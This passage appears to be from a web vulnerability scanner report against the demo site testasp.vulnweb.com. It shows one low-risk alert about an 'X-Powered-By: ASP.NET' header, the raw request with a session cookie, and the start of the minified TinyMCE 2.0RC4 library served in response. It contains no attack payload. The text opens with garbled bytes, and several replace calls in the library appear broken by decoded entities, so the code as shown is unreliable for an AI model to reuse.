ÁýA8ûK"BIÓÏ2µQ¹Ñ(ó Åaî¡ '@R; |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return 